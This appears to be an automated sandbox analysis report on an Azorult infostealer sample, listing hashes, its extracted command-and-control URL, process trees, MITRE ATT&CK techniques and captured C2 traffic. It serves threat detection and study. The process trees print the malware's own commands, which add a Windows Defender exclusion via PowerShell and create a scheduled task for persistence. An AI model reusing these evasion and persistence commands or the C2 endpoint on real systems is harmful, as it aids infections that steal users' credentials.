azorult | 106839b29f3e5a9d68e9e3edb18c9e20edb1b165bc1042d576ebe6887f4b4c9a

Resubmissions

14/10/2024, 23:25 UTC

241014-3ef8ls1hkg 10

14/10/2024, 23:15 UTC

241014-28scasvfqq 10

Analysis

max time kernel
117s
max time network
118s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
14/10/2024, 23:25 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

722ef401e5cbb067c5c33faa402774d3c75ef08e0c8cc4d7e66a9cfa53684088.zip
Size

440KB
MD5

8692f6bd4fa3ac41af1d33e9c243e67c
SHA1

458634c33f3286890adec73bb41003062a0a23bf
SHA256

106839b29f3e5a9d68e9e3edb18c9e20edb1b165bc1042d576ebe6887f4b4c9a
SHA512

4ae3bfacfbd8e10633d780dfe5275363603c34e3f599e9d54f2373f8201bb531380380114453a9a72f534518f0e01e21cd38bfb6f3e2e0d686eb4e31b7f08b5e
SSDEEP

12288:8iPM9TrqLargEYyHk27qXmfZb8m4XO3nG+6U9L2d:8bdqL8HlwmfZ4XXO3nGmL2d

Score

10^/10

azorult discovery execution infostealer trojan

Malware Config

Extracted

Family

azorult

http://5gw4d.xyz/PL341/index.php

Signatures

Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
trojan infostealer azorult

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
856	powershell.exe
2012	powershell.exe

Executes dropped EXE 6 IoCs

pid	Process
2924	722ef401e5cbb067c5c33faa402774d3c75ef08e0c8cc4d7e66a9cfa53684088.exe
2764	722ef401e5cbb067c5c33faa402774d3c75ef08e0c8cc4d7e66a9cfa53684088.exe
2188	722ef401e5cbb067c5c33faa402774d3c75ef08e0c8cc4d7e66a9cfa53684088.exe
960	722ef401e5cbb067c5c33faa402774d3c75ef08e0c8cc4d7e66a9cfa53684088.exe
2928	722ef401e5cbb067c5c33faa402774d3c75ef08e0c8cc4d7e66a9cfa53684088.exe
2948	722ef401e5cbb067c5c33faa402774d3c75ef08e0c8cc4d7e66a9cfa53684088.exe

Loads dropped DLL 4 IoCs

pid	Process
2924	722ef401e5cbb067c5c33faa402774d3c75ef08e0c8cc4d7e66a9cfa53684088.exe
2764	722ef401e5cbb067c5c33faa402774d3c75ef08e0c8cc4d7e66a9cfa53684088.exe
2764	722ef401e5cbb067c5c33faa402774d3c75ef08e0c8cc4d7e66a9cfa53684088.exe
2764	722ef401e5cbb067c5c33faa402774d3c75ef08e0c8cc4d7e66a9cfa53684088.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 2924 set thread context of 2188	2924	722ef401e5cbb067c5c33faa402774d3c75ef08e0c8cc4d7e66a9cfa53684088.exe	41
PID 2764 set thread context of 2928	2764	722ef401e5cbb067c5c33faa402774d3c75ef08e0c8cc4d7e66a9cfa53684088.exe	49

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	722ef401e5cbb067c5c33faa402774d3c75ef08e0c8cc4d7e66a9cfa53684088.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	DllHost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	722ef401e5cbb067c5c33faa402774d3c75ef08e0c8cc4d7e66a9cfa53684088.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	722ef401e5cbb067c5c33faa402774d3c75ef08e0c8cc4d7e66a9cfa53684088.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	722ef401e5cbb067c5c33faa402774d3c75ef08e0c8cc4d7e66a9cfa53684088.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
1712	schtasks.exe
1736	schtasks.exe

Suspicious behavior: EnumeratesProcesses 12 IoCs

pid	Process
1916	7zFM.exe
2012	powershell.exe
1916	7zFM.exe
1916	7zFM.exe
2764	722ef401e5cbb067c5c33faa402774d3c75ef08e0c8cc4d7e66a9cfa53684088.exe
2764	722ef401e5cbb067c5c33faa402774d3c75ef08e0c8cc4d7e66a9cfa53684088.exe
2764	722ef401e5cbb067c5c33faa402774d3c75ef08e0c8cc4d7e66a9cfa53684088.exe
2764	722ef401e5cbb067c5c33faa402774d3c75ef08e0c8cc4d7e66a9cfa53684088.exe
856	powershell.exe
1916	7zFM.exe
1916	7zFM.exe
1916	7zFM.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
1916	7zFM.exe

Suspicious use of AdjustPrivilegeToken 8 IoCs

description	pid	Process
Token: SeRestorePrivilege	1916	7zFM.exe
Token: 35	1916	7zFM.exe
Token: SeSecurityPrivilege	1916	7zFM.exe
Token: SeSecurityPrivilege	1916	7zFM.exe
Token: SeSecurityPrivilege	1916	7zFM.exe
Token: SeDebugPrivilege	2012	powershell.exe
Token: SeDebugPrivilege	2764	722ef401e5cbb067c5c33faa402774d3c75ef08e0c8cc4d7e66a9cfa53684088.exe
Token: SeDebugPrivilege	856	powershell.exe

Suspicious use of FindShellTrayWindow 4 IoCs

pid	Process
1916	7zFM.exe
1916	7zFM.exe
1916	7zFM.exe
1916	7zFM.exe

Suspicious use of WriteProcessMemory 52 IoCs

description	pid	Process	procid_target
PID 1916 wrote to memory of 2924	1916	7zFM.exe	30
PID 1916 wrote to memory of 2924	1916	7zFM.exe	30
PID 1916 wrote to memory of 2924	1916	7zFM.exe	30
PID 1916 wrote to memory of 2924	1916	7zFM.exe	30
PID 1916 wrote to memory of 2764	1916	7zFM.exe	31
PID 1916 wrote to memory of 2764	1916	7zFM.exe	31
PID 1916 wrote to memory of 2764	1916	7zFM.exe	31
PID 1916 wrote to memory of 2764	1916	7zFM.exe	31
PID 2924 wrote to memory of 2012	2924	722ef401e5cbb067c5c33faa402774d3c75ef08e0c8cc4d7e66a9cfa53684088.exe	37
PID 2924 wrote to memory of 2012	2924	722ef401e5cbb067c5c33faa402774d3c75ef08e0c8cc4d7e66a9cfa53684088.exe	37
PID 2924 wrote to memory of 2012	2924	722ef401e5cbb067c5c33faa402774d3c75ef08e0c8cc4d7e66a9cfa53684088.exe	37
PID 2924 wrote to memory of 2012	2924	722ef401e5cbb067c5c33faa402774d3c75ef08e0c8cc4d7e66a9cfa53684088.exe	37
PID 2924 wrote to memory of 1712	2924	722ef401e5cbb067c5c33faa402774d3c75ef08e0c8cc4d7e66a9cfa53684088.exe	39
PID 2924 wrote to memory of 1712	2924	722ef401e5cbb067c5c33faa402774d3c75ef08e0c8cc4d7e66a9cfa53684088.exe	39
PID 2924 wrote to memory of 1712	2924	722ef401e5cbb067c5c33faa402774d3c75ef08e0c8cc4d7e66a9cfa53684088.exe	39
PID 2924 wrote to memory of 1712	2924	722ef401e5cbb067c5c33faa402774d3c75ef08e0c8cc4d7e66a9cfa53684088.exe	39
PID 2924 wrote to memory of 2188	2924	722ef401e5cbb067c5c33faa402774d3c75ef08e0c8cc4d7e66a9cfa53684088.exe	41
PID 2924 wrote to memory of 2188	2924	722ef401e5cbb067c5c33faa402774d3c75ef08e0c8cc4d7e66a9cfa53684088.exe	41
PID 2924 wrote to memory of 2188	2924	722ef401e5cbb067c5c33faa402774d3c75ef08e0c8cc4d7e66a9cfa53684088.exe	41
PID 2924 wrote to memory of 2188	2924	722ef401e5cbb067c5c33faa402774d3c75ef08e0c8cc4d7e66a9cfa53684088.exe	41
PID 2924 wrote to memory of 2188	2924	722ef401e5cbb067c5c33faa402774d3c75ef08e0c8cc4d7e66a9cfa53684088.exe	41
PID 2924 wrote to memory of 2188	2924	722ef401e5cbb067c5c33faa402774d3c75ef08e0c8cc4d7e66a9cfa53684088.exe	41
PID 2924 wrote to memory of 2188	2924	722ef401e5cbb067c5c33faa402774d3c75ef08e0c8cc4d7e66a9cfa53684088.exe	41
PID 2924 wrote to memory of 2188	2924	722ef401e5cbb067c5c33faa402774d3c75ef08e0c8cc4d7e66a9cfa53684088.exe	41
PID 2924 wrote to memory of 2188	2924	722ef401e5cbb067c5c33faa402774d3c75ef08e0c8cc4d7e66a9cfa53684088.exe	41
PID 2924 wrote to memory of 2188	2924	722ef401e5cbb067c5c33faa402774d3c75ef08e0c8cc4d7e66a9cfa53684088.exe	41
PID 2764 wrote to memory of 856	2764	722ef401e5cbb067c5c33faa402774d3c75ef08e0c8cc4d7e66a9cfa53684088.exe	43
PID 2764 wrote to memory of 856	2764	722ef401e5cbb067c5c33faa402774d3c75ef08e0c8cc4d7e66a9cfa53684088.exe	43
PID 2764 wrote to memory of 856	2764	722ef401e5cbb067c5c33faa402774d3c75ef08e0c8cc4d7e66a9cfa53684088.exe	43
PID 2764 wrote to memory of 856	2764	722ef401e5cbb067c5c33faa402774d3c75ef08e0c8cc4d7e66a9cfa53684088.exe	43
PID 2764 wrote to memory of 1736	2764	722ef401e5cbb067c5c33faa402774d3c75ef08e0c8cc4d7e66a9cfa53684088.exe	44
PID 2764 wrote to memory of 1736	2764	722ef401e5cbb067c5c33faa402774d3c75ef08e0c8cc4d7e66a9cfa53684088.exe	44
PID 2764 wrote to memory of 1736	2764	722ef401e5cbb067c5c33faa402774d3c75ef08e0c8cc4d7e66a9cfa53684088.exe	44
PID 2764 wrote to memory of 1736	2764	722ef401e5cbb067c5c33faa402774d3c75ef08e0c8cc4d7e66a9cfa53684088.exe	44
PID 2764 wrote to memory of 960	2764	722ef401e5cbb067c5c33faa402774d3c75ef08e0c8cc4d7e66a9cfa53684088.exe	47
PID 2764 wrote to memory of 960	2764	722ef401e5cbb067c5c33faa402774d3c75ef08e0c8cc4d7e66a9cfa53684088.exe	47
PID 2764 wrote to memory of 960	2764	722ef401e5cbb067c5c33faa402774d3c75ef08e0c8cc4d7e66a9cfa53684088.exe	47
PID 2764 wrote to memory of 960	2764	722ef401e5cbb067c5c33faa402774d3c75ef08e0c8cc4d7e66a9cfa53684088.exe	47
PID 2764 wrote to memory of 2948	2764	722ef401e5cbb067c5c33faa402774d3c75ef08e0c8cc4d7e66a9cfa53684088.exe	48
PID 2764 wrote to memory of 2948	2764	722ef401e5cbb067c5c33faa402774d3c75ef08e0c8cc4d7e66a9cfa53684088.exe	48
PID 2764 wrote to memory of 2948	2764	722ef401e5cbb067c5c33faa402774d3c75ef08e0c8cc4d7e66a9cfa53684088.exe	48
PID 2764 wrote to memory of 2948	2764	722ef401e5cbb067c5c33faa402774d3c75ef08e0c8cc4d7e66a9cfa53684088.exe	48
PID 2764 wrote to memory of 2928	2764	722ef401e5cbb067c5c33faa402774d3c75ef08e0c8cc4d7e66a9cfa53684088.exe	49
PID 2764 wrote to memory of 2928	2764	722ef401e5cbb067c5c33faa402774d3c75ef08e0c8cc4d7e66a9cfa53684088.exe	49
PID 2764 wrote to memory of 2928	2764	722ef401e5cbb067c5c33faa402774d3c75ef08e0c8cc4d7e66a9cfa53684088.exe	49
PID 2764 wrote to memory of 2928	2764	722ef401e5cbb067c5c33faa402774d3c75ef08e0c8cc4d7e66a9cfa53684088.exe	49
PID 2764 wrote to memory of 2928	2764	722ef401e5cbb067c5c33faa402774d3c75ef08e0c8cc4d7e66a9cfa53684088.exe	49
PID 2764 wrote to memory of 2928	2764	722ef401e5cbb067c5c33faa402774d3c75ef08e0c8cc4d7e66a9cfa53684088.exe	49
PID 2764 wrote to memory of 2928	2764	722ef401e5cbb067c5c33faa402774d3c75ef08e0c8cc4d7e66a9cfa53684088.exe	49
PID 2764 wrote to memory of 2928	2764	722ef401e5cbb067c5c33faa402774d3c75ef08e0c8cc4d7e66a9cfa53684088.exe	49
PID 2764 wrote to memory of 2928	2764	722ef401e5cbb067c5c33faa402774d3c75ef08e0c8cc4d7e66a9cfa53684088.exe	49
PID 2764 wrote to memory of 2928	2764	722ef401e5cbb067c5c33faa402774d3c75ef08e0c8cc4d7e66a9cfa53684088.exe	49

C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\722ef401e5cbb067c5c33faa402774d3c75ef08e0c8cc4d7e66a9cfa53684088.zip"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1916
- C:\Users\Admin\AppData\Local\Temp\7zOC773C7B6\722ef401e5cbb067c5c33faa402774d3c75ef08e0c8cc4d7e66a9cfa53684088.exe
  "C:\Users\Admin\AppData\Local\Temp\7zOC773C7B6\722ef401e5cbb067c5c33faa402774d3c75ef08e0c8cc4d7e66a9cfa53684088.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2924
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\VbxFiQYCyFDgGL.exe"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2012
- - C:\Windows\SysWOW64\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VbxFiQYCyFDgGL" /XML "C:\Users\Admin\AppData\Local\Temp\tmp6068.tmp"
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:1712
- - C:\Users\Admin\AppData\Local\Temp\7zOC773C7B6\722ef401e5cbb067c5c33faa402774d3c75ef08e0c8cc4d7e66a9cfa53684088.exe
    "C:\Users\Admin\AppData\Local\Temp\7zOC773C7B6\722ef401e5cbb067c5c33faa402774d3c75ef08e0c8cc4d7e66a9cfa53684088.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:2188
- C:\Users\Admin\AppData\Local\Temp\7zOC77F1D96\722ef401e5cbb067c5c33faa402774d3c75ef08e0c8cc4d7e66a9cfa53684088.exe
  "C:\Users\Admin\AppData\Local\Temp\7zOC77F1D96\722ef401e5cbb067c5c33faa402774d3c75ef08e0c8cc4d7e66a9cfa53684088.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2764
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\VbxFiQYCyFDgGL.exe"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:856
- - C:\Windows\SysWOW64\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VbxFiQYCyFDgGL" /XML "C:\Users\Admin\AppData\Local\Temp\tmp6FE3.tmp"
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:1736
- - C:\Users\Admin\AppData\Local\Temp\7zOC77F1D96\722ef401e5cbb067c5c33faa402774d3c75ef08e0c8cc4d7e66a9cfa53684088.exe
    "C:\Users\Admin\AppData\Local\Temp\7zOC77F1D96\722ef401e5cbb067c5c33faa402774d3c75ef08e0c8cc4d7e66a9cfa53684088.exe"
    3⤵
    - Executes dropped EXE
    PID:960
- - C:\Users\Admin\AppData\Local\Temp\7zOC77F1D96\722ef401e5cbb067c5c33faa402774d3c75ef08e0c8cc4d7e66a9cfa53684088.exe
    "C:\Users\Admin\AppData\Local\Temp\7zOC77F1D96\722ef401e5cbb067c5c33faa402774d3c75ef08e0c8cc4d7e66a9cfa53684088.exe"
    3⤵
    - Executes dropped EXE
    PID:2948
- - C:\Users\Admin\AppData\Local\Temp\7zOC77F1D96\722ef401e5cbb067c5c33faa402774d3c75ef08e0c8cc4d7e66a9cfa53684088.exe
    "C:\Users\Admin\AppData\Local\Temp\7zOC77F1D96\722ef401e5cbb067c5c33faa402774d3c75ef08e0c8cc4d7e66a9cfa53684088.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:2928

C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
1⤵
PID:1776

C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{06622D85-6856-4460-8DE1-A81921B41C4B}
1⤵
- System Location Discovery: System Language Discovery
PID:2560

C:\Windows\System32\rundll32.exe
"C:\Windows\System32\rundll32.exe" shell32.dll,Options_RunDLL 0
1⤵
PID:1812

Network

DNS

5gw4d.xyz

722ef401e5cbb067c5c33faa402774d3c75ef08e0c8cc4d7e66a9cfa53684088.exe

Remote address:

8.8.8.8:53

Request

5gw4d.xyz

IN A

Response

5gw4d.xyz

IN A

103.224.212.216
POST

http://5gw4d.xyz/PL341/index.php

722ef401e5cbb067c5c33faa402774d3c75ef08e0c8cc4d7e66a9cfa53684088.exe

Remote address:

103.224.212.216:80

Request

POST /PL341/index.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
Host: 5gw4d.xyz
Content-Length: 101
Cache-Control: no-cache

Response

HTTP/1.1 302 Found

date: Mon, 14 Oct 2024 23:27:04 GMT
server: Apache
set-cookie: __tad=1728948424.4017393; expires=Thu, 12-Oct-2034 23:27:04 GMT; Max-Age=315360000
location: http://ww25.5gw4d.xyz/PL341/index.php?subid1=20241015-1027-045d-be8f-b6a7864916df
content-length: 2
content-type: text/html; charset=UTF-8
connection: close
DNS

ww25.5gw4d.xyz

722ef401e5cbb067c5c33faa402774d3c75ef08e0c8cc4d7e66a9cfa53684088.exe

Remote address:

8.8.8.8:53

Request

ww25.5gw4d.xyz

IN A

Response

ww25.5gw4d.xyz

IN CNAME

77026.bodis.com

77026.bodis.com

IN A

199.59.243.227
GET

http://ww25.5gw4d.xyz/PL341/index.php?subid1=20241015-1027-045d-be8f-b6a7864916df

722ef401e5cbb067c5c33faa402774d3c75ef08e0c8cc4d7e66a9cfa53684088.exe

Remote address:

199.59.243.227:80

Request

GET /PL341/index.php?subid1=20241015-1027-045d-be8f-b6a7864916df HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
Host: ww25.5gw4d.xyz
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: __tad=1728948424.4017393

Response

HTTP/1.1 200 OK

date: Mon, 14 Oct 2024 23:27:04 GMT
content-type: text/html; charset=utf-8
content-length: 1186
x-request-id: 55829a49-864e-4e3a-853b-3c9c1e4f01eb
cache-control: no-store, max-age=0
accept-ch: sec-ch-prefers-color-scheme
critical-ch: sec-ch-prefers-color-scheme
vary: sec-ch-prefers-color-scheme
x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_XST6E5iRcrn5zSePfNpwJmWbB/yHkYqAG7+SOsmYN+iVJwmvARU+jB6USPHGRjiHW8grB7/V2N5meLXzT9NFJw==
set-cookie: parking_session=55829a49-864e-4e3a-853b-3c9c1e4f01eb; expires=Mon, 14 Oct 2024 23:42:05 GMT; path=/
POST

http://5gw4d.xyz/PL341/index.php

722ef401e5cbb067c5c33faa402774d3c75ef08e0c8cc4d7e66a9cfa53684088.exe

Remote address:

103.224.212.216:80

Request

POST /PL341/index.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
Host: 5gw4d.xyz
Content-Length: 101
Cache-Control: no-cache
Cookie: __tad=1728948424.4017393

Response

HTTP/1.1 302 Found

date: Mon, 14 Oct 2024 23:27:06 GMT
server: Apache
location: http://ww25.5gw4d.xyz/PL341/index.php?subid1=20241015-1027-0639-9a99-327a3f29eaab
content-length: 2
content-type: text/html; charset=UTF-8
connection: close
GET

http://ww25.5gw4d.xyz/PL341/index.php?subid1=20241015-1027-0639-9a99-327a3f29eaab

722ef401e5cbb067c5c33faa402774d3c75ef08e0c8cc4d7e66a9cfa53684088.exe

Remote address:

199.59.243.227:80

Request

GET /PL341/index.php?subid1=20241015-1027-0639-9a99-327a3f29eaab HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
Connection: Keep-Alive
Cookie: __tad=1728948424.4017393; parking_session=55829a49-864e-4e3a-853b-3c9c1e4f01eb
Cache-Control: no-cache
Host: ww25.5gw4d.xyz

Response

HTTP/1.1 200 OK

date: Mon, 14 Oct 2024 23:27:05 GMT
content-type: text/html; charset=utf-8
content-length: 1186
x-request-id: 779eafb5-f946-4129-ba22-0f9169224fe6
cache-control: no-store, max-age=0
accept-ch: sec-ch-prefers-color-scheme
critical-ch: sec-ch-prefers-color-scheme
vary: sec-ch-prefers-color-scheme
x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_I/GFq5Rg0U4FsPBbNDod8gnb+1B2zfdMmUvhrgq3u7DKRoInDthZgl86IoPSuBHeoDQr95VOwDEiBxbyP8MXuw==
set-cookie: parking_session=55829a49-864e-4e3a-853b-3c9c1e4f01eb; expires=Mon, 14 Oct 2024 23:42:06 GMT

103.224.212.216:80

http://5gw4d.xyz/PL341/index.php

http

722ef401e5cbb067c5c33faa402774d3c75ef08e0c8cc4d7e66a9cfa53684088.exe

493 B
516 B
5
4

HTTP Request

POST http://5gw4d.xyz/PL341/index.php

HTTP Response

302
199.59.243.227:80

http://ww25.5gw4d.xyz/PL341/index.php?subid1=20241015-1027-045d-be8f-b6a7864916df

http

722ef401e5cbb067c5c33faa402774d3c75ef08e0c8cc4d7e66a9cfa53684088.exe

523 B
2.7kB
6
5

HTTP Request

GET http://ww25.5gw4d.xyz/PL341/index.php?subid1=20241015-1027-045d-be8f-b6a7864916df

HTTP Response

200
103.224.212.216:80

http://5gw4d.xyz/PL341/index.php

http

722ef401e5cbb067c5c33faa402774d3c75ef08e0c8cc4d7e66a9cfa53684088.exe

527 B
420 B
5
4

HTTP Request

POST http://5gw4d.xyz/PL341/index.php

HTTP Response

302
199.59.243.227:80

http://ww25.5gw4d.xyz/PL341/index.php?subid1=20241015-1027-0639-9a99-327a3f29eaab

http

722ef401e5cbb067c5c33faa402774d3c75ef08e0c8cc4d7e66a9cfa53684088.exe

531 B
2.0kB
5
4

HTTP Request

GET http://ww25.5gw4d.xyz/PL341/index.php?subid1=20241015-1027-0639-9a99-327a3f29eaab

HTTP Response

200

8.8.8.8:53

5gw4d.xyz

dns

722ef401e5cbb067c5c33faa402774d3c75ef08e0c8cc4d7e66a9cfa53684088.exe

55 B
71 B
1
1

DNS Request

5gw4d.xyz

DNS Response

103.224.212.216
8.8.8.8:53

ww25.5gw4d.xyz

dns

722ef401e5cbb067c5c33faa402774d3c75ef08e0c8cc4d7e66a9cfa53684088.exe

60 B
105 B
1
1

DNS Request

ww25.5gw4d.xyz

DNS Response

199.59.243.227

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\7zOC773C7B6\722ef401e5cbb067c5c33faa402774d3c75ef08e0c8cc4d7e66a9cfa53684088.exe

Filesize
483KB

MD5
7a0093c743fc33a5e111f2fec269f79b

SHA1
feadb2ca02d41f2d834b8577f39a582d4bdd734f

SHA256
722ef401e5cbb067c5c33faa402774d3c75ef08e0c8cc4d7e66a9cfa53684088

SHA512
77cade5a9e48f8d1da6e689a7881b23a1be165f1be8f26059458766e6fc4db8c03c058beb19dd0f644aebd218371ef487fe31a086e6fbc7089976d0802010eee

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp6068.tmp

Filesize
1KB

MD5
839983a383338385d2618b7548647294

SHA1
7ade3cccc247633fc2f4758ac5369aa71b093dda

SHA256
98f8da2d82809551764c336c3d4a44358cba14e43d64ce097a32835956d599c8

SHA512
a05e763260f3c3943e0eacb723626892b77201e3156b4784480dc7c0b72c17c8f58291078d28c686c942be4b75129a0aec8000aa7ec17512ce17bf8b7d0a292e

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\TDT7X29M.txt

Filesize
116B

MD5
77b0cff77b526a2901fb72661741be8c

SHA1
1c245e153aa5367bd963ef9649bc8c2b8788a0f3

SHA256
a9b3e62fec512415d84e954d309a9093bc68d8fa52e71c40cdeff840c7398a4f

SHA512
e27e879e2f935e9d28831e45ed92a84c53332ab757e0ff2f5f72543c443757ef1a68fe26db9e53298f43ad6cba262d4c6fd1c4ec7f7453c9b8b7a5a6f7b3dca1

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\UKSLGP47.txt

Filesize
89B

MD5
a43b87c2bf4930b8cf4b30629f0f0153

SHA1
127da980dc0f3651b8d5b1d293c3b9600515c5aa

SHA256
1529bcf13c9ca336dfaf1fa42b3d4ac2ab4a4a7dbf9de99608c2faa944f272cc

SHA512
9aca4f00dc51d90c4f1b6977b652f4e0641de711b6e5113d9929348811da5fbbd0e0f493c089a35489447ad972be401f87645d510c79d0b901ee44d04ea2ed41

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\9XEIBZRTU05N4QUZUUKV.temp

Filesize
7KB

MD5
df413e9d28e3932db868bdc93700f88a

SHA1
457981f13635e24f1bae7cf745da70cf2eff578e

SHA256
4b7c5591ef4c4779df22a6b898a45c07e4a6eeccc60a900d6f8017b4594aa678

SHA512
e36c9b80e4953c125abac0ca08cc0961f15e8b475d2ec98df72ba6bf86506d2329e6a5c704f02806538f1e51ab4344f8e57cff60a2049d31a9c13d4e08178f5b

Download Submit
memory/2188-44-0x0000000000400000-0x0000000000420000-memory.dmp

Filesize
128KB

Download
memory/2188-48-0x0000000000400000-0x0000000000420000-memory.dmp

Filesize
128KB

Download
memory/2188-42-0x0000000000400000-0x0000000000420000-memory.dmp

Filesize
128KB

Download
memory/2188-40-0x0000000000400000-0x0000000000420000-memory.dmp

Filesize
128KB

Download
memory/2188-53-0x0000000000400000-0x0000000000420000-memory.dmp

Filesize
128KB

Download
memory/2188-51-0x0000000000400000-0x0000000000420000-memory.dmp

Filesize
128KB

Download
memory/2188-50-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

Filesize
4KB

Download
memory/2188-46-0x0000000000400000-0x0000000000420000-memory.dmp

Filesize
128KB

Download
memory/2764-57-0x0000000005090000-0x00000000050F6000-memory.dmp

Filesize
408KB

Download
memory/2764-27-0x0000000001250000-0x00000000012D0000-memory.dmp

Filesize
512KB

Download
memory/2924-38-0x0000000004E60000-0x0000000004E82000-memory.dmp

Filesize
136KB

Download
memory/2924-30-0x0000000005B10000-0x0000000005B76000-memory.dmp

Filesize
408KB

Download
memory/2924-14-0x0000000000560000-0x0000000000578000-memory.dmp

Filesize
96KB

Download
memory/2924-13-0x0000000005A30000-0x0000000005A9C000-memory.dmp

Filesize
432KB

Download
memory/2924-12-0x0000000000AC0000-0x0000000000B40000-memory.dmp

Filesize
512KB

Download
memory/2928-80-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

Filesize
4KB

Download

Resubmissions

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

DNS Request

DNS Response

DNS Request

DNS Response

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

We care about your privacy.